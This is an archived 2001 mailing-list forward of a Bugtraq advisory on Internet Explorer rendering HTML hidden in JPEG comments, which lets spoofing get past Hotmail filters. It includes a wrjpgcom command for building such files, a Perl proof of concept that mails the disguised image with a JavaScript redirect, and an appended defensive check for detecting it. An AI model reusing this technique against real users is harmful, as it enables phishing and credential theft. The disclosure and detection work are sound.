Internet Explorer Vulnerability to Web Mail-based Spoofing Attacks (fwd)

From: Tom WSMF (tomwhore@inetarena.com)
Date: Thu Feb 08 2001 - 12:34:12 PST


More fun from the "let's put html in everything" jihad.

Bang Bang Have a nice day

---------- Forwarded message ----------
Date: Thu, 8 Feb 2001 01:35:44 -0500
From: Kee Hinckley <nazgul@SOMEWHERE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Internet Explorer Vulnerability to Web Mail-based Spoofing Attacks

VERSIONS AFFECTED
Internet Explorer 5.0 on the Macintosh and 4.0 on Windows both
have the problem. IE 5 on Windows did not seem vulnerable; however,
it also didn't display the test image correctly, so there may still be issues.

SUMMARY
First. Internet Explorer has a "feature" which makes it possible to
cause it to display arbitrary HTML that is embedded in an image (or
any other type of file).

Second. Hotmail at least, and most likely all other web-based mail
systems, does not filter out HTML hidden in images (one can hardly
blame them). As a result, the JavaScript and CSS spoofing attacks
previously described on this list can be used against a Macintosh
Hotmail user, and Hotmail will *not* filter out offending HTML,
JavaScript or CSS tags. This technique may also work against some
virus scanners.

DETAILS
When IE reads a file from the web, it doesn't trust the Content-Type or
file ending, instead it examines the first 256 bytes of the file to see if
it recognizes the file type. Apparently this is considered a
feature, although it's caused no-end of pain to web designers who
are trying to assign a different download behavior to a particular
file. The problem does not occur when the file is read from the disk.

The parser that IE uses is not terribly sophisticated. If it sees
one of several common HTML tags in the first 256 bytes, it will
assume that the file is an HTML file, even if the rest of it is
binary garbage. Since it is possible to embed comments in a number
of types of files, and those comments often occur close to the
beginning of the file, it is trivial to convince IE that an image
file is in fact an HTML file. Viewing this file from inside an HTML
page (i.e. in an img tag) will show a broken image in IE5 on the Mac
and Windows, although IE4 on Windows shows the image correctly.
However opening it directly in the browser will result in some garbage
characters, followed by the interpreted HTML content.

To create a commented JPG file with embedded HTML, try a command such
as this on a Unix box:
        djpeg sample.jpg | cjpeg | wrjpgcom -cfile cfile > html.jpg
where 'cfile' is a file containing html. You may not need the
djpeg/cjpeg combo, but my first attempt just using wrjpgcom didn't
put the comment close enough to the beginning of the file.

Hotmail can be persuaded to treat an image as an attachment by
giving the file a non-standard Content-Type. Since Hotmail doesn't
know that the browser is going to interpret an arbitrary attachment
as an HTML file, it doesn't filter the content of the file. Clicking on
the attachment will cause Hotmail to scan the attachment for viruses
and then ask you if you would like to download it. When you click on
the download button, the window will be replaced for a brief moment
with garbage characters (the raw JPG) and then the HTML will be
displayed. In the case of a JavaScript or CSS exploit, the code would
presumably replace the page of garbage characters with a password
prompt or other item. The user would not unreasonably assume that
something had gone wrong with the software and their session had
expired.

CREDITS
This vulnerability was originally discovered by Anders Pearson and
Peter Leonard of the Columbia Center for New Media Teaching and
Learning <http://ccnmtl.columbia.edu/>. They ran into it when they
were attempting to embed XML in image comments. I heard about
it from a discussion on the WebDesign mailing list
(http://www.webdesign-l.com/) and wrote a test exploit (enclosed
below) to see if Hotmail users were in fact vulnerable.

EXPLOIT
The following Perl script will email a small JPG image to a user. In
order to ensure that the file is treated as an attachment and not
displayed inline, it has given the file the content type "image/jpg"
instead of the proper "image/jpeg". If you mail this to a Mac IE
Hotmail user, and they attempt to download the attached image,
it will redirect their browser to one of my web sites.

Although embedding the HTML in an image makes it more likely
to pass through filters, there is nothing inherent in this process that
requires that it be an image. The user's expectation that they will
be viewing an image file helps from a social engineering context, but
even a text file that has been given a different Content-Type might
pass through filters. The key issue is that the browser thinks it knows
more about the file than the person who sent it, and that it is executing
HTML code when the user is expecting it to download a file--before they
expect to have to worry about the file's content.

#!/usr/bin/perl

# sendit.pl
#
# Sends a JPG image (with a false content type) to the destination email
# address. The JPG contains an embedded HTML comment which will
# cause some versions of Internet Explorer to interpret the file as though
# it were HTML, executing the contained JavaScript and redirecting the browser to
# http://www.spamwatcher.com/.
#
# The HTML in the comment is:
#<html><head><title>foo</title><script>document.location.replace('http://www.spamwatcher.com/')</script></head><body>test</body></html>
#

use strict;
use warnings;
use Net::SMTP;

die("Use: $0 from to\n") if (!$ARGV[1]);
sendit($ARGV[0], $ARGV[1]);

sub sendit {
    my ($from, $to) = @_;
    my $smtp;

    $smtp = Net::SMTP->new('localhost') or die("Cannot connect to localhost: $!\n");
    $smtp->mail($from);    # envelope sender (the original passed $to here)
    $smtp->to($to);
    $smtp->data();
    $smtp->datasend("To: $to\n");
    $smtp->datasend("From: $from\n");
    $smtp->datasend("Subject: Test of html.jpg\n");
    $smtp->datasend("Content-Type: image/jpg\n");
    $smtp->datasend("Content-Transfer-Encoding: base64\n");
    $smtp->datasend("Content-Disposition: attachment; filename=html.jpg\n");
    $smtp->datasend("\n");
    # The base64-encoded html.jpg body was elided from this archive copy.
    $smtp->datasend(<<X);
X
    $smtp->dataend();      # terminate DATA so the message is actually queued
    $smtp->quit();
}

--

Kee Hinckley - Somewhere.Com, LLC - Cyberspace Architects
Now Playing - Folk, Rock, odd stuff - http://www.somewhere.com/playlist.cgi

I'm not sure which upsets me more: that people are so unwilling to accept
responsibility for their own actions, or that they are so eager to regulate
everyone else's.

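The check a webmail or gateway filter would want against the behaviour described above, as an added example that is not part of the original post or of any Microsoft or Hotmail code: it walks a JPEG's marker segments to pull out COM (comment) payloads, and it applies the post's sniffing rule (a common HTML tag anywhere in the first 256 bytes) to the raw file. The tag list and the minimal constructed JPEGs are assumptions for illustration, not the browser's real sniffing table.

```python
import re
import struct

# The post says IE keys on "several common HTML tags" in the first 256 bytes.
# This tag list is an assumption; the real table was never published.
HTML_TAG_RE = re.compile(rb"<\s*(html|head|body|script|title|img|table|iframe)\b", re.I)
SNIFF_WINDOW = 256


def jpeg_comments(data: bytes) -> list:
    """Return payloads of all COM (0xFFFE) segments found before SOS/EOI."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    comments, pos = [], 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):          # EOI or SOS: header segments are over
            break
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]  # includes itself
        payload = data[pos + 4:pos + 2 + length]
        if marker == 0xFE:
            comments.append(payload)
        pos += 2 + length
    return comments


def sniffs_as_html(data: bytes, window: int = SNIFF_WINDOW) -> bool:
    """Mimic the described heuristic: any listed tag inside the first 256 bytes."""
    return HTML_TAG_RE.search(data[:window]) is not None


def risky_attachment(data: bytes) -> bool:
    """Flag a JPEG that a sniffing browser would render as HTML instead of an image."""
    return sniffs_as_html(data) and any(HTML_TAG_RE.search(c) for c in jpeg_comments(data))


def _jpeg_with_comment(comment: bytes) -> bytes:
    # Constructed minimal stream: SOI, one COM segment, EOI. Not a decodable image.
    com = b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return b"\xff\xd8" + com + b"\xff\xd9"


# Constructed samples: a benign comment, an early HTML comment, and HTML placed
# past the 256-byte window (which the post notes the first wrjpgcom attempt hit).
CLEAN = _jpeg_with_comment(b"Created with constructed sample")
TAINTED = _jpeg_with_comment(b"<html><head><title>x</title></head><body>test</body></html>")
LATE = _jpeg_with_comment(b"x" * 300 + b"<html><body>test</body></html>")
```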



This archive was generated by hypermail 2b29 : Fri Apr 27 2001 - 23:17:30 PDT